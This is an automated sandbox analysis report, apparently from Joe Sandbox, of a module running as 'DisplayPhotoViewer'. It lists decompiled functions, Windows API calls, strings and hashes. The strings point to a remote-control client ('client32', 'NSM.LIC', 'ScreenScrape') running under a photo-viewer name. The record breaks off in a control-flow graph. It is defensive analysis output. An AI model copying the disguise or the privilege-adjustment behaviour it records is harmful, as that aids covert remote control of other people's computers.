                                                                                                    Function 1110DF20 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CoInitialize.OLE32(00000000), ref: 1110DF75
                                                                                                    • CoCreateInstance.OLE32(111B431C,00000000,00000001,111B432C,00000000,?,00000000,Client,silent,00000000,00000000,?,110490FB), ref: 1110DF8F
                                                                                                    • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 1110DFB4
                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 1110DFC6
                                                                                                    • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 1110DFD9
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 1110DFE5
                                                                                                    • CoUninitialize.OLE32(00000000), ref: 1110E081
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                                    • String ID: SHELL32.DLL$SHGetSettings
                                                                                                    • API String ID: 4195908086-2348320231
                                                                                                    • Opcode ID: 6fbccb74453ebec1787b50326cc5eeaba8f0eca116b3d08528add7d2c6ecbbdc
                                                                                                    • Instruction ID: ba3c6776d0729064969c19f3645f0374f756f5dea8bb0d64cb3e8dea25d93473
                                                                                                    • Opcode Fuzzy Hash: 6fbccb74453ebec1787b50326cc5eeaba8f0eca116b3d08528add7d2c6ecbbdc
                                                                                                    • Instruction Fuzzy Hash: A0514C71E00216AFDB00DFA6D9C4AAFFBB9EF88304F118569E915A7244DB31A941CB61
                                                                                                    Function 1106EC60 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset
                                                                                                    • String ID: NBCTL32.DLL$_License$serial_no
                                                                                                    • API String ID: 2102423945-35127696
                                                                                                    • Opcode ID: 653bb77b455b6c18b27f7df18132fb675e900917e9aa25ac55e5b203bfc1ca89
                                                                                                    • Instruction ID: c6264eba9f14969d287a78ceefe44932d8c6770fa42137e5d81bf52cd27c0966
                                                                                                    • Opcode Fuzzy Hash: 653bb77b455b6c18b27f7df18132fb675e900917e9aa25ac55e5b203bfc1ca89
                                                                                                    • Instruction Fuzzy Hash: A5B19175A00619AFEB14CF98DC81FEEB7F9FF88304F148169E9099B295D674AD01CB90
                                                                                                    Function 1102F670 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(1102CD20,?,00000000), ref: 1102F694
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID: Client32$NSMWClass$NSMWClass
                                                                                                    • API String ID: 3192549508-611217420
                                                                                                    • Opcode ID: ba2122a7ab9d6f1fd2cf2d33c3ee7d0838d4c9a0c4a5ebf5af100f2b22473edd
                                                                                                    • Instruction ID: 3a4bcc9f6bd7397bd32ddb8e72587a4daf11e26b451f674d4af64f86ab577af0
                                                                                                    • Opcode Fuzzy Hash: ba2122a7ab9d6f1fd2cf2d33c3ee7d0838d4c9a0c4a5ebf5af100f2b22473edd
                                                                                                    • Instruction Fuzzy Hash: 5CF06234E112269BC306DFE9C8D4A5EFBA0FB4434CB108179E51587359EB71B9048B56
                                                                                                    Function 110995F0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,00000001,0BA671C0,00000000), ref: 11099628
                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 11099644
                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0796E970,0796E970,0796E970,0796E970,0796E970,0796E970,0796E970,111E2704,?,00000001,00000001), ref: 11099670
                                                                                                    • EqualSid.ADVAPI32(?,0796E970,?,00000001,00000001), ref: 11099683
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InformationToken$AllocateEqualInitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 1878589025-0
                                                                                                    • Opcode ID: fcd88f57a71a988521b8b08dbd2086078f309af80604b73771dfb9e416257057
                                                                                                    • Instruction ID: 6bd8eb4c4cad34c55da363dbc0f21a698628fa77646de1f7df69030cc6c4b31d
                                                                                                    • Opcode Fuzzy Hash: fcd88f57a71a988521b8b08dbd2086078f309af80604b73771dfb9e416257057
                                                                                                    • Instruction Fuzzy Hash: DB214131B1111AAFEB00CFA5DC91FFEB7B8EB48704F404069E919E7280EB71A905C7A1
                                                                                                    Function 11098130 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(000F01FF,?,1102E7AA,00000000,00000000,00080000,218EC38C,00080000,00000000,00000000), ref: 1109815D
                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 11098164
                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 11098175
                                                                                                    • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 11098199
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 2349140579-0
                                                                                                    • Opcode ID: 9ee9ec285ba56b4d44a54cb517bcb8e89d4fefe5617a925a881260382dd7a429
                                                                                                    • Instruction ID: 376e0fcdbf336b5c88d9a2b68030271aaf7df2d0e86e7052954bc46407278919
                                                                                                    • Opcode Fuzzy Hash: 9ee9ec285ba56b4d44a54cb517bcb8e89d4fefe5617a925a881260382dd7a429
                                                                                                    • Instruction Fuzzy Hash: E6011EB2600219ABD710DF98DC89BAEF7BCEF44705F10456DFA1597284D7B0AA04CBB1
                                                                                                    Function 110981C0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,110994F0,00000244,cant create events), ref: 110981DC
                                                                                                    • CloseHandle.KERNEL32(?,00000000,110994F0,00000244,cant create events), ref: 110981E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                    • String ID:
                                                                                                    • API String ID: 81990902-0
                                                                                                    • Opcode ID: dd6f65fc7ddd526b4117c398a96d909ec16d80eb71b10002a495610badfbb40c
                                                                                                    • Instruction ID: 1728187298f114f26f6db0e234b74eee7761e16ffd30fc9c94aeb24f42928b38
                                                                                                    • Opcode Fuzzy Hash: dd6f65fc7ddd526b4117c398a96d909ec16d80eb71b10002a495610badfbb40c
                                                                                                    • Instruction Fuzzy Hash: 4BE0EC71210214ABE738CE24AC94FA777ECAF04B01F21495EFD56E6284CA60E9408B64
                                                                                                    Function 1102CEE0 Relevance: 231.0, APIs: 31, Strings: 100, Instructions: 1771windowthreadsleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    • GetSystemMetrics.USER32(00002000), ref: 1102D064
                                                                                                    • FindWindowA.USER32(NSMWClass,00000000), ref: 1102D225
                                                                                                      • Part of subcall function 11108440: GetCurrentThreadId.KERNEL32 ref: 111084D6
                                                                                                      • Part of subcall function 11108440: InitializeCriticalSection.KERNEL32(-00000010,?,1102F5F3,00000001,00000000), ref: 111084E9
                                                                                                      • Part of subcall function 11108440: InitializeCriticalSection.KERNEL32(111E4480,?,1102F5F3,00000001,00000000), ref: 111084F8
                                                                                                      • Part of subcall function 11108440: EnterCriticalSection.KERNEL32(111E4480,?,1102F5F3), ref: 1110850C
                                                                                                      • Part of subcall function 11108440: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1102F5F3), ref: 11108532
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102D261
                                                                                                    • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102D289
                                                                                                    • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102D546
                                                                                                      • Part of subcall function 11090450: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102D2B8,00000000,?,00000100,00000000,00000000,00000000), ref: 1109046C
                                                                                                      • Part of subcall function 11090450: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102D2B8,00000000,?,00000100,00000000,00000000,00000000), ref: 11090479
                                                                                                      • Part of subcall function 11090450: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 110904A9
                                                                                                    • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102D2E8
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102D2F4
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1102D30C
                                                                                                    • FindWindowA.USER32(NSMWClass,00000000), ref: 1102D319
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102D33B
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102D096
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • LoadIconA.USER32(11000000,000004C1), ref: 1102D6D1
                                                                                                    • LoadIconA.USER32(11000000,000004C2), ref: 1102D6E1
                                                                                                    • DestroyCursor.USER32(00000000), ref: 1102D70A
                                                                                                    • DestroyCursor.USER32(00000000), ref: 1102D71E
                                                                                                    • GetVersion.KERNEL32(?,?,?,?,?,00000000,00000000,?,?,View,Client,Bridge), ref: 1102DC4F
                                                                                                    • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,View,Client,Bridge), ref: 1102DCA2
                                                                                                    • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,00000000,?,?,View,Client), ref: 1102E1B4
                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102E1EE
                                                                                                    • DispatchMessageA.USER32(?), ref: 1102E1F8
                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102E20A
                                                                                                    • CloseHandle.KERNEL32(00000000,Function_00025F90,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102E4A5
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102E4DA
                                                                                                    • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,00000000), ref: 1102E4E1
                                                                                                    • SetWindowPos.USER32(0006029E,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102E511
                                                                                                    • CloseHandle.KERNEL32(00000000,11055D40,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102E58F
                                                                                                    • wsprintfA.USER32 ref: 1102E6F4
                                                                                                      • Part of subcall function 11025F00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025F2A
                                                                                                      • Part of subcall function 11025F00: TranslateMessage.USER32(?), ref: 11025F40
                                                                                                      • Part of subcall function 11025F00: DispatchMessageA.USER32(?), ref: 11025F46
                                                                                                      • Part of subcall function 1102BC80: InterlockedIncrement.KERNEL32(111E1058), ref: 1102BCD2
                                                                                                      • Part of subcall function 1102BC80: Sleep.KERNEL32(0000EA60), ref: 1102BCF5
                                                                                                      • Part of subcall function 1102BC80: GetCurrentProcess.KERNEL32(00000020), ref: 1102BCFB
                                                                                                      • Part of subcall function 1102BC80: SetPriorityClass.KERNEL32(00000000), ref: 1102BD02
                                                                                                      • Part of subcall function 1102BC80: SetEvent.KERNEL32(00000BE8), ref: 1102BD31
                                                                                                    • PostMessageA.USER32(NSMWControl32,00000000,Default,Client,UseIPC,00000001,00000000), ref: 1102E7EB
                                                                                                    • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1102E7FF
                                                                                                    • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1102E825
                                                                                                    • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1102E84B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$Process$Window$CloseHandlePost$CriticalCurrentEventOpenSectionThreadwsprintf$ClassCreateCursorDestroyDispatchFindIconInitializeLoadPeekPrioritySleepTokenVersion$EnterErrorExitIncrementInterlockedLastMetricsObjectSendSingleSystemTranslateWait_malloc_memset
                                                                                                    • String ID: *BeepSound$*BeepUsingSpeaker$*PriorityClass$*ScreenScrape$*StartupDelay$910646$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$License Control Internal Error$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V11.41.14$V12.01.14$View$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                                    • API String ID: 336719646-37721096
                                                                                                    • Opcode ID: fb47d26e2b320981d3be43dfb150f47d724b4478e50a2c4446b854928f5e64e7
                                                                                                    • Instruction ID: 009040ae52c6831aa03cd40e0bad1ac2b62ea8a30d96e08e3b1cba246fc5cad1
                                                                                                    • Opcode Fuzzy Hash: fb47d26e2b320981d3be43dfb150f47d724b4478e50a2c4446b854928f5e64e7
                                                                                                    • Instruction Fuzzy Hash: C7E2D774F412669FD712DFE4CCD4BADF7A5AB4830CF5080A9EA15A7284EB706D40CB62
                                                                                                    Function 1102C3D0 Relevance: 79.4, APIs: 15, Strings: 30, Instructions: 614COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 944 1102c3d0-1102c420 call 111077a0 947 1102c422-1102c436 call 11138dd0 944->947 948 1102c438 944->948 950 1102c43e-1102c483 call 11138650 call 11138e30 947->950 948->950 956 1102c623-1102c632 call 1113b0a0 950->956 957 1102c489 950->957 963 1102c638-1102c648 956->963 959 1102c490-1102c493 957->959 961 1102c495-1102c497 959->961 962 1102c4b8-1102c4c1 959->962 964 1102c4a0-1102c4b1 961->964 965 1102c4c7-1102c4ce 962->965 966 1102c5f4-1102c60d call 11138e30 962->966 967 1102c64a 963->967 968 1102c64f-1102c663 call 1102b560 963->968 964->964 969 1102c4b3 964->969 965->966 970 1102c5c3-1102c5d8 call 11158647 965->970 971 1102c4d5-1102c4d7 965->971 972 1102c5da-1102c5ef call 11158647 965->972 973 1102c56a-1102c59d call 11157121 call 11138650 965->973 974 1102c5ab-1102c5c1 call 111592d0 965->974 975 1102c55b-1102c565 965->975 976 1102c59f-1102c5a9 965->976 977 1102c51c-1102c522 965->977 978 1102c54c-1102c556 965->978 966->959 996 1102c613-1102c615 966->996 967->968 992 1102c668-1102c66d 968->992 969->966 970->966 971->966 983 1102c4dd-1102c517 call 11157121 call 11138650 call 1102b560 971->983 972->966 973->966 974->966 975->966 976->966 985 1102c524-1102c538 call 11158647 977->985 986 1102c53d-1102c547 977->986 978->966 983->966 985->966 986->966 998 1102c713-1102c72d call 1113c580 992->998 1001 1102c673-1102c698 call 110b24c0 call 1113c600 992->1001 996->998 999 1102c61b-1102c621 996->999 1012 1102c783-1102c78f call 11029e50 998->1012 1013 1102c72f-1102c748 call 11059e50 998->1013 999->956 999->963 1020 1102c6a3-1102c6a9 1001->1020 1021 1102c69a-1102c6a1 1001->1021 1024 1102c791-1102c798 1012->1024 1025 1102c768-1102c76f 1012->1025 1013->1012 1023 1102c74a-1102c75c 1013->1023 1026 1102c6ab-1102c6b2 call 11026a10 1020->1026 1027 1102c709 1020->1027 1021->998 1023->1012 1040 1102c75e 1023->1040 1029 1102c775-1102c778 1024->1029 1030 1102c79a-1102c7a4 1024->1030 1028 1102c945-1102c966 GetComputerNameA 1025->1028 1025->1029 1026->1027 1039 1102c6b4-1102c6e6 1026->1039 1027->998 1036 1102c968-1102c99c call 110268e0 1028->1036 1037 1102c99e-1102c9a4 1028->1037 1034 1102c77a-1102c781 call 110b24c0 1029->1034 1035 1102c7a9 1029->1035 1030->1028 1038 1102c7ac-1102c880 call 110265f0 call 11026890 call 110265f0 * 2 LoadLibraryA GetProcAddress 1034->1038 1035->1038 1036->1037 1064 1102c9f2-1102c9fe 1036->1064 1041 1102c9a6-1102c9ab 1037->1041 1042 1102c9da-1102c9ed call 111592d0 1037->1042 1091 1102c886-1102c89d 1038->1091 1092 1102c915-1102c91d SetLastError 1038->1092 1057 1102c6f0-1102c6ff call 110eef60 1039->1057 1058 1102c6e8-1102c6ee 1039->1058 1040->1025 1046 1102c9b1-1102c9b5 1041->1046 1062 1102cbe7-1102cc0a 1042->1062 1052 1102c9d1-1102c9d3 1046->1052 1053 1102c9b7-1102c9b9 1046->1053 1061 1102c9d6-1102c9d8 1052->1061 1059 1102c9bb-1102c9c1 1053->1059 1060 1102c9cd-1102c9cf 1053->1060 1065 1102c702-1102c704 call 1102bc80 1057->1065 1058->1057 1058->1065 1059->1052 1067 